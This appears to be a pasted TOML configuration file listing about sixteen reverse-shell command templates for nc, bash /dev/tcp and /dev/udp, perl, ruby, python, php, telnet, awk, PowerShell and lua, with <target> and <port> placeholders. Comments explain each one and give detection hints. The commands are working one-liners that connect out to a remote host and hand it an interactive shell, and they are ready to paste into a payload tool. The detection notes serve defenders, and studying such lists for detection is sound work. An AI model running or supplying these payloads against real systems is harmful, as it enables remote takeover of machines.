opexxx

shell_list

Aug 24th, 2020
  # One element of a [[shells]] array of tables; each element pairs a display name with a
  # reverse-shell command template. <target> and <port> are literal placeholders: TOML does
  # no interpolation, so substitution is left to whatever program reads this file.
  # This template uses netcat's -e option to run /bin/bash attached to the connection.
  # Detection: process arguments that combine nc, -e and a shell path.
  1. [[shells]]
  2. name = 'nc with -e'
  3. cmd = 'nc <target> <port> -e /bin/bash'
  4.  
  # Builds the channel without nc's -e option: /tmp/f is removed, recreated as a FIFO with
  # mkfifo, and /bin/sh -i is wired between that FIFO and nc.
  # Detection: mkfifo under /tmp followed by an interactive sh piped into nc. The command
  # never deletes /tmp/f afterwards, so the FIFO can remain on disk as an artifact.
  5. [[shells]]
  6. name = 'nc without -e'
  7. cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <target> <port> >/tmp/f'
  8.  
  # Uses bash's /dev/tcp/<host>/<port> redirection target, so bash itself opens the
  # connection and no separate network client appears in the command line.
  # Detection: "/dev/tcp/" in shell arguments or history; an interactive bash (-i) whose
  # descriptors 0, 1 and 2 all point at one TCP socket.
  9. [[shells]]
  10. name = 'bash tcp'
  11. cmd = 'bash -i >& /dev/tcp/<target>/<port> 0>&1'
  12.  
  # UDP form of the bash redirection template: the target path is /dev/udp/... instead of
  # /dev/tcp/....
  # Detection: "/dev/udp/" in shell arguments; a rule that matches only "/dev/tcp/" does not
  # cover this form.
  13. [[shells]]
  14. name = 'bash udp'
  15. cmd = 'bash -i >& /dev/udp/<target>/<port> 0>&1'
  16.  
  # Perl's Socket module opens a TCP connection; STDIN, STDOUT and STDERR are reopened onto
  # that socket and exec then starts "/bin/sh -i".
  # Detection: perl -e arguments containing socket( and exec(; afterwards an sh -i process
  # whose standard descriptors are a socket.
  17. [[shells]]
  18. name = 'perl with /bin/sh'
  19. cmd = "perl -e 'use Socket;$i=\"<target>\";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
  20.  
  # Forks and lets the parent exit; the child connects with IO::Socket::INET and hands each
  # line it receives to system. No shell path is named anywhere in the template.
  # Detection: perl -MIO with IO::Socket::INET in its arguments; a perl process holding an
  # outbound socket while it launches commands.
  21. [[shells]]
  22. name = 'perl without /bin/sh'
  23. cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"<target>:<port>\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
  24.  
  # Same read-and-run loop as the 'perl without /bin/sh' template but with no fork: perl
  # connects with IO::Socket::INET and passes each received line to system.
  # Detection: perl -MIO with IO::Socket::INET in its arguments and an outbound socket.
  25. [[shells]]
  26. name = 'perl for windows'
  27. cmd = "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"<target>:<port>\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
  28.  
  # TCPSocket.open connects, .to_i yields the socket's descriptor number, and exec starts
  # "/bin/sh -i" with stdin, stdout and stderr redirected to that descriptor.
  # Detection: ruby -rsocket -e in process arguments; an sh -i process whose standard
  # descriptors are a socket.
  29. [[shells]]
  30. name = 'ruby with /bin/sh'
  31. cmd = "ruby -rsocket -e'f=TCPSocket.open(\"<target>\",<port>).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
  32.  
  # The parent exits after fork; the child reads lines with c.gets, runs each through
  # IO.popen and prints the command output back to the socket.
  # Detection: ruby -rsocket with TCPSocket.new and IO.popen in its arguments.
  33. [[shells]]
  34. name = 'ruby without /bin/sh'
  35. cmd = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"<target>\",\"<port>\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
  36.  
  # Same gets / IO.popen loop as the 'ruby without /bin/sh' template, without the
  # "exit if fork" step.
  # Detection: ruby -rsocket with TCPSocket.new and IO.popen in its arguments.
  37. [[shells]]
  38. name = 'ruby for windows'
  39. cmd = "ruby -rsocket -e 'c=TCPSocket.new(\"<target>\",\"<port>\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
  40.  
  # Connects a TCP socket, duplicates its descriptor onto 0, 1 and 2 with os.dup2, then runs
  # ["/bin/sh", "-i"] through subprocess.call.
  # Detection: python -c arguments that combine socket, os.dup2 and subprocess; an sh -i
  # started by python with a socket as its standard descriptors.
  41. [[shells]]
  42. name = 'python with /bin/sh'
  43. cmd = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<target>\",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
  44.  
  # fsockopen opens the connection and exec runs "/bin/sh -i" with descriptor 3 on stdin,
  # stdout and stderr; the number 3 is written literally rather than derived from $sock.
  # Detection: php -r arguments containing fsockopen and exec; on web hosts, a shell started
  # by the PHP runtime.
  45. [[shells]]
  46. name = 'php with /bin/sh'
  47. cmd = "php -r '$sock=fsockopen(\"<target>\",<port>);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
  48.  
  # Removes /tmp/p, recreates it as a named pipe with mknod and, when that succeeds, runs
  # telnet to <target> <port>; the trailing 0/tmp/p is kept exactly as pasted.
  # Detection: mknod creating a pipe under /tmp followed by an outbound telnet session.
  49. [[shells]]
  50. name = 'telnet'
  51. cmd = 'rm -f /tmp/p; mknod /tmp/p p && telnet <target> <port> 0/tmp/p'
  52.  
  # Relies on gawk's /inet/tcp special file and its |& two-way pipe: the loop sends a
  # "shell>" prompt, reads one line, runs it as a command and returns the output, until the
  # line read is "exit".
  # Detection: "/inet/tcp/" in awk arguments; an awk process that owns a TCP socket.
  53. [[shells]]
  54. name = 'awk'
  55. cmd = "awk 'BEGIN {s = \"/inet/tcp/0/<target>/<port>\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"
  56.  
  # Starts PowerShell with -NoP -NonI -W Hidden -Exec Bypass and creates a
  # System.Net.Sockets.TCPClient. The loop decodes bytes read from the stream as ASCII, runs
  # them through iex, and writes back the output followed by a "PS <path>> " prompt.
  # Detection: that flag combination on a command line; TCPClient together with iex in
  # script-block logging (event ID 4104); powershell.exe making outbound connections.
  57. [[shells]]
  58. name = 'powershell'
  59. cmd = 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<target>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
  60.  
  # Loads the 'socket' module (presumably LuaSocket, which is not part of stock Lua),
  # connects, then os.execute runs "/bin/sh -i" with descriptor 3 written literally for
  # stdin, stdout and stderr.
  # Detection: lua -e arguments containing socket.tcp and os.execute.
  61. [[shells]]
  62. name = 'lua with /bin/sh'
  63. cmd = "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('<target>','<port>');os.execute('/bin/sh -i <&3 >&3 2>&3');\""
  64.  
  # Read-and-run loop with no shell path: tcp:receive() reads a line, io.popen runs it, the
  # whole output is read and returned with tcp:send, and the loop ends once receive reports
  # "closed".
  # Detection: lua -e arguments containing require("socket") and io.popen.
  65. [[shells]]
  66. name = 'lua without /bin/sh (works on windows)'
  67. cmd = "lua -e 'local host, port = \"<target>\", <port> local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'"